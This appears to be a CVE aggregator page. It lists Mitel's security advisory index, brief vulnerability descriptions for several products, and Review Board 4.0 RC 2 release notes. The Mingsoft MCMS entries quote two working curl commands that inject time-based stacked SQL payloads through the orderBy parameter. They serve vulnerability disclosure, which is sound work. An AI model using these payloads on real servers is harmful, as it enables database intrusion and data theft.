Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.

Mitel 6800 Series SIP Phone and 6900 Series SIP Phone Access Control Vulnerability 22-0004 CVE-2022-29855 2022-05-03 2022-05-03 Mitel 6900 Series IP Phone Access Control Vulnerability 22-0003 CVE-2022-29854 2022-05-03 2022-05-03 MiVoice Connect Data Validation Vulnerability 22-0002 CVE-2022-29499 2022-04-19 2022-04-21 MiCollab, MiVoice Business Express Access Control Vulnerability 22-0001 CVE-2022-26143 2022-02-22 2022-03-11 Vulnerability in Apache Log4j Libraries Affecting Mitel Products 21-0010 CVE-2021-44228 CVE-2021-45046 CVE-2021-45105 CVE-2021-44832 CVE-2021-4104 CVE-2022-23302 CVE-2022-23305 CVE-2022-23307 2021-12-13 2022-03-22 Mitel Interaction Call Recording Vulnerability 21-0006 CVE-2021-37586 2021-08-02 2021-08-02 Mitel MiCollab Multiple Security Vulnerabilities 21-0005 CVE-2021-32067 CVE-2021-32072 CVE-2021-32068 CVE-2021-32071 CVE-2021-32069 CVE-2021-32070 2021-05-24 2021-05-24 Mitel MiCollab Multiple Security Vulnerabilities 21-0004 CVE-2021-27402 CVE-2021-27401 2021-03-09 2021-03-09 Mitel MiContact Center Enterprise - Directory Traversal Vulnerability 21-0003 CVE-2021-26714 2021-02-16 2021-02-16 Mitel MiContact Center Business Access Token Vulnerability 21-0002 CVE-2021-3352 2021-02-10 2021-02-10 Mitel BusinessCTI Enterprise - Remote Code Execution Vulnerability 21-0001 CVE-2021-3176 2021-01-25 2021-01-25 Mitel MiCollab NuPoint Messenger Unauthenticated Access Vulnerability 20-0016 CVE-2020-35547 2020-12-29 2020-12-29 Mitel MiCollab Multiple Security Vulnerabilities 20-0015 CVE-2020-25606 CVE-2020-25608 CVE-2020-25609 CVE-2020-25610 CVE-2020-25611 CVE-2020-25612 CVE-2020-27340 2020-11-12 2020-11-02 Mitel MiVoice SIP and MiNet Phones Bluetooth Auto Pair Vulnerability 20-0014 CVE-2020-27639 CVE-2020-27640 2020-11-02 2020-11-02 Mitel MiVoice SIP, MiNet and DECT Phones Information Disclosure (KNOB) Vulnerability 20-0013 CVE-2019-9506 2020-11-02 2020-11-02 Mitel BusinessCTI Enterprise - Remote Code Execution Vulnerability 20-0012 CVE-2020-27154 2020-10-20 2020-10-20 Mitel MiContact Center Business Multiple Security Vulnerabilities 20-0011 CVE-2020-24692 CVE-2020-24693 2020-09-02 2020-09-02 Mitel MiCloud Management Portal Multiple Security Vulnerabilities 20-0010 CVE-2020-24592 CVE-2020-24593 CVE-2020-24594 CVE-2020-24595 2020-08-31 2020-08-31 Mitel Border Gateway update for a Buffer Overflow vulnerability in PPP Daemon 20-0009 CVE-2020-8597 2020-07-07 2020-07-07 Mitel MiCollab Multiple Security Vulnerabilities 20-0008 CVE-2020-13863 CVE-2020-13767 2020-06-25 2020-06-25 Mitel MiVoice 6800 and 6900 series SIP Phones - Memory Disclosure Vulnerability 20-0007 CVE-2020-13617 2020-06-02 2020-06-02 Mitel MiVoice Connect Client - Remote Code Execution Vulnerability 20-0006 CVE-2020-12456 2020-06-01 2020-07-16 MiCollab Multiple Security Vulnerabilities 20-0005 CVE-2020-11798 CVE-2020-11797 2020-04-30 2020-04-30 MiVoice Connect - Remote Code Execution and Weak Encryption Vulnerabilities 20-0004 CVE-2020-10211 CVE-2020-10377 2020-03-31 2020-03-31 Mitel MiContact Center Business with Site Based Security – Authentication Vulnerability 20-0003 CVE-2020-9379 2020-03-02 2020-03-02 Microsoft changes to Default Security Settings for LDAP on Active Directory 20-0002 N/A 2020-02-17 2020-03-30 Mitel 6970 – Port Configuration Vulnerability 20-0001 N/A 2020-01-22 2020-01-22 Mitel SIP-DECT – Encryption key vulnerability 19-0009 CVE-2019-19891 2019-12-27 2019-12-27 Mitel MiCollab for Android – Cross-Site-Scripting (XSS) 19-0008 CVE-2019-19370 2019-12-20 2019-12-20 MiCollab SQL injection and XSS vulnerabilities 19-0007 CVE-2019-19607 CVE-2019-19608 CVE-2019-19371 2019-12-20 2019-12-20 Mitel MiVoice 6800/6900 SIP series phones key length vulnerability 19-0006 CVE-2019-18863 2019-11-22 2019-11-22 Linux Sudo Bypass of User Restrictions Vulnerability 19-0005 CVE-2019-14287 2019-11-12 2019-11-26 MiVoice Business Security Certificate 19-0004 N/A 2019-08-28 2019-08-28 Mitel CMG Suite SQL Injection Vulnerability 19-0003 CVE-2018-18285 CVE-2018-18286 2019-03-29 2019-03-29 InAttend and CMG Suite Password Vulnerability 19-0002 CVE-2018-19275 2019-03-29 2019-03-29 Mitel MiVoice 6800 and 6900 SIP series phones weak authentication vulnerability 19-0001 N/A 2019-03-19 2019-03-19 MiCollab Authorization Vulnerability 18-0012 CVE-2018-18819 2018-10-31 2018-10-31 MiCollab SQL Injection and Stored XSS vulnerabilities 18-0011 N/A 2018-10-31 2018-10-31 Apache Struts 2 Remote Code Execution Vulnerability 18-0010 CVE-2018-11776 2018-10-31 2018-10-31 MiVoice 5300 IP Series Phone Denial of Service Vulnerability 18-0009 CVE-2018-15497 2018-09-25 2018-09-25 MiVoice Office 400 Reflected XSS Vulnerability 18-0008 CVE-2018-16226 2018-09-04 2018-09-04 ST 14.2 Reflected XSS Vulnerability 18-0007 CVE-2018-12901 2018-09-04 2018-09-04 Side-Channel Analysis, Spectre Variant 4 and 3a 18-0006 CVE-2018-3640 2018-05-23 2018-06-26 Mitel for Salesforce XSS Vulnerability 18-0005 N/A 2018-03-06 2018-03-06 Connect OnSite and ST 14.2 Multiple PHP Vulnerabilities 18-0004 CVE-2018-5779 CVE-2018-5780 CVE-2018-5781 CVE-2018-5782 CVE-2017-16250 CVE-2017-16251 2018-03-06 2018-03-06 MiVoice Connect and ST 14.2 SQL Injection and Reflected XSS Vulnerabilities 18-0003 CVE-2018-9101 CVE-2018-9102 CVE-2018-9103 CVE-2018-9104 2018-01-31 2018-01-31 XML External Entity (XXE) Vulnerability in MiCollab AWV 18-0002 CWE-918 2018-01-31 2018-01-31 Side-Channel Analysis Vulnerabilities 18-0001 CVE-2017-5715 CVE-2017-5753 CVE-2017-5754 2018-01-08 2018-05-08 SSRF/XSPA Vulnerability in MiContact Center Business 17-0012 CWE-918 2017-12-08 2017-12-08 Vulnerability in MiCollab Microsoft Outlook Plugin 17-0011 N/A 2017-10-30 2017-10-30 Multiple Vulnerabilities in MiCollab and MiCollab AWV 17-0010 CWE-20 CWE-79 CWE-93 CWE-307 2017-09-14 2017-09-14 SMB1 Remote Code Execution 17-0009 CWE-306 CWE-862 2017-06-05 2017-06-05 OpenSSL Vulnerabilities in MiCollab Desktop Applications 17-0008 CVE-2016-2183 CVE-2014-0160 2017-06-05 2017-06-05 Unauthorized Access to MiCollab Client 17-0006 CWE-306 CWE-862 2017-06-05 2017-06-05 WannaCry Ransomware Attack 17-0007 N/A 2017-05-23 2017-05-23 Apache Struts Remote Code Execution Vulnerability CVE-2017-5638 17-0004 CVE-2017-5638 2017-03-20 2017-03-20 Multiple Vulnerabilities in MiVoice Conference/Video Phone (UC360) 17-0003 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 CVE-2015-3864 2017-02-15 2017-04-03 Privilege Escalation / Remote Code Execution Vulnerability in MiVoice Conference/Video Phone (UC360) 17-0002 CVE-2015-1538 CVE-2015-1539 CVE-2015-3824 CVE-2015-3826 CVE-2015-3827 CVE-2015-3828 CVE-2015-3829 CVE-2015-3864 2017-02-15 2017-02-15 Misuse / Potential Compromise of Certain Mitel Product Certificates 17-0001 CWE-321 2017-02-09 2017-04-03 Vulnerability in Objective Systems ASN1C (CVE-2016-5080) 16-0020 CVE-2016-5080 CWE-190 2016-12-02 2016-12-02 MiCollab Client Web Portal Call Service Vulnerability 16-0018 CWE-284 2016-11-04 2016-11-04 MiCollab Desktop Client Bypasses Windows Firewall 16-0016 CWE-264 2016-11-04 2016-11-04 Unrestricted File Upload in MiCollab AWV 16-0015 CWE-434 2016-11-04 2016-11-04 CVE-2016-5195: Linux Kernel Privilege Escalation 16-0019 CVE-2016-5195 2016-10-27 2016-12-06 Multiple Vulnerabilities in ntpd versions < 4.2.8p8 / < 4.3.93 16-0014 CVE-2016-7979 CVE-2016-4957 CVE-2016-4956 CVE-2016-4954 CVE-2016-4953 CVE-2016-2518 CVE-2016-2106 CVE-2016-1548 CVE-2016-1547 CVE-2016-1550 2016-08-02 2016-08-02 Multiple Vulnerabilities in OpenSSL 16-0013 CVE-2016-2105 CVE-2016-2106 CVE-2016-2107 CVE-2016-2108 CVE-2016-2109 CVE-2016-2176 CVE-2016-2842 2016-07-05 2016-07-05 XSS Vulnerability in MiCollab AWV 16-0012 N/A 2016-06-03 2016-06-03 Multiple Vulnerabilities in ImageMagick 16-0011 CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 2016-05-09 2016-06-03 Authentication Bypass and Toll-Fraud on MiVoice Office 250 / Mitel 5000 16-0009 N/A 2016-03-18 2016-03-18 DROWN (OpenSSL vulnerability) - CVE-2016-0800 16-0008 CVE-2016-0800 2016-03-07 2016-03-07 XSS vulnerability in MiCC 7.x 16-0005 N/A 2016-03-07 2016-03-07 NTPD Vulnerabilities 16-0004 CVE-2015-8138 2016-03-07 2016-05-02 glibc: getaddrinfo stack-based buffer overflow (CVE-2015-7547) 16-0007 CVE-2015-7547 2016-02-25 2016-05-02 OpenSSH Client Vulnerabilities 16-0003 CVE-2016-0777 CVE-2016-0778 2016-02-01 2016-02-01 Multiple Weaknesses in Mitel 6700/6800 series SIP phones 16-0002 N/A 2016-02-01 2016-02-01 SQL Injection Vulnerability in MiCollab 16-0001 N/A 2016-02-01 2016-02-01 Java Deserialization Vulnerability 15-0013 N/A 2015-12-04 2016-02-01 Multiple Oracle Java Vulnerabilities 15-0012 CVE-2015-4731 CVE-2015-4732 CVE-2015-4733 CVE-2015-4734 CVE-2015-4748 CVE-2015-4760 CVE-2015-4803 CVE-2015-4805 CVE-2015-4806 CVE-2015-4835 CVE-2015-4840 CVE-2015-4842 CVE-2015-4843 CVE-2015-4844 CVE-2015-4860 CVE-2015-4872 CVE-2015-4881 CVE-2015-4882 CVE-2015-4883 CVE-2015-4893 CVE-2015-4903 CVE-2015-4911 2015-12-04 2016-05-02 Security Advisory for MiCC 15-0007 N/A 2015-11-04 2015-11-04 OpenSSH: authentication limitsbypass (CVE-2015-5600) 15-0009 CVE-2015-5600 2015-09-04 2015-09-04 OpenSSL Alternative Chains Certificate Forgery (CVE-2015-1793) 15-0008 CVE-2015-1793 2015-07-31 2015-07-31 CGI Flaw in MiCollab AWV 15-0006 N/A 2015-07-31 2015-07-31 Weakness in Diffie-Hellman key exchange / Logjam 15-0004 CVE-2015-1716 CVE-2015-4000 2015-07-31 2015-09-29

CVE-2022-29855: Security Advisories

Foxit PDF Reader and PDF Editor before 11.2.2 have a Type Confusion issue that causes a crash because of Unsigned32 mishandling during JavaScript execution.

CVE-2022-30557: Security Bulletins | Foxit Software

Hospital Management System in PHP with Source Code (HMS) 1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in room.php.

CVE-2022-30449

An authenticated user could execute code via a SQLi vulnerability in waimairenCMS before version 9.1.

CVE-2022-30451

Mingsoft MCMS v5.2.7 was discovered to contain a SQL injection vulnerability in /mdiy/dict/listExcludeApp URI via orderBy parameter.

/mdiy/dict/listExcludeApp路由的orderBy参数存在堆叠SQL注入  
  

证明

    curl -w "%{time_total}\n" -i -I -X $'GET' $'http://127.0.0.1:8080/mdiy/dict/listExcludeApp?dictType=1&orderBy=1;select/**/if(substring((select/**/database()),1,4)=\'mcms\',sleep(3),1);'

CVE-2022-30047: Mingsoft MCMS v5.2.7 SQL注入【前台】 · Issue #I54VLM · 铭飞/MCMS - Gitee.com

Mingsoft MCMS 5.2.7 was discovered to contain a SQL injection vulnerability in /mdiy/dict/list URI via orderBy parameter.

/mdiy/dict/list路由的orderBy参数存在堆叠SQL注入  
  

证明

    curl -w "%{time_total}\n" -i -I -X $'GET' $'http://127.0.0.1:8080/mdiy/dict/list?dictType=1&orderBy=1)a;select/**/if(substring((select/**/database()),1,4)=\'mcms\',sleep(3),1);'

CVE-2022-30048: Mingsoft MCMS v5.2.7 SQL注入【前台】 · Issue #I54VG0 · 铭飞/MCMS - Gitee.com

ShopWind <= v3.4.2 has a Sql injection vulnerability in Database.php

CVE-2022-30452

A Cross-Site Scripting (XSS) vulnerability exists within Review Board versions 3.0.20 and 4.0 RC1 and earlier. An authenticated attacker may inject malicious Javascript code when using Markdown editing within the application which remains persistent.

**Review Board 4.0 RC 2 Release Notes¶**

**Release date**: April 14, 2021

Please see the 4.0 beta 1, 4.0 beta 2, and 4.0 RC 1 release notes for general information and upgrade notes.

These release notes show changes since RC 1.

**Installation¶**

To install this release, run the following:

$ sudo pip install \\
    --trusted-host downloads.reviewboard.org \\
    -f http://downloads.reviewboard.org/releases/ReviewBoard/4.0/ \\
    -f http://downloads.reviewboard.org/releases/rbintegrations/2.0/ \\
    --pre -U ReviewBoard

Or:

$ sudo easy\_install \\
    -f http://downloads.reviewboard.org/releases/ReviewBoard/4.0/ \\
    -f http://downloads.reviewboard.org/releases/rbintegrations/2.0/ \\
    -U ReviewBoard

Note

If this is a new install on Python 2.7, please use **pip**, as support for **easy\_install** is going away.

**pip** is required for Python 3.

Warning

We **do not** recommend upgrading a production server with this version of Review Board. It’s best to install on a test server, with a copy of your production database, in case there are any major problems.

**Packaging¶**

*   bcrypt is capped to < 3.2 on Python 2.7.
    
*   pyparsing is capped to 2.4.x on Python 2.7.
    

**Security Fixes¶**

This release fixes a XSS vulnerability in Markdown rendering, which could allow an attacker to craft a link that executes arbitrary JavaScript code when clicked.

The attacker would need to be someone who already has legitimate access to your server, and can perform reviews or otherwise access your code.

We recommend that everyone (especially those running public servers) upgrades to address this vulnerability, though the seriousness of the issue will vary from company to company.

Thanks to Matt S. for the security report.

**Removed Features¶**

*   Removed the old **dumpdb** and **loaddb** management commands.
    
    These weren’t compatible with the version of Django used for Review Board 4.0, and were often misused. We recommend that people use their database’s own SQL dump/load tools to move databases.
    
    We’re working on a tool for obtaining structured dumps of the database and performing database imports, merges, and moving between different types of databases. This will be available as a free feature in Power Pack.
    

**Bug Fixes¶**

**Reviews¶**

*   Fixed an invisible Publish Review button at the top of a review request page.
    
    This could be accidentally clicked, creating empty reviews.
    
*   The styling for inline code literals (text surrounded by backticks) in Markdown text fields now looks the same whether editing or viewing text.
    
    This has been a long-standing issue since the introduction of Markdown support. We’ve finally made this consistent.
    

**Search¶**

*   Issues communicating with the search backend will no longer cause pages or the API to crash.
    

**Contributors¶**

*   Christian Hammond
    
*   Matt S

Tag

#sql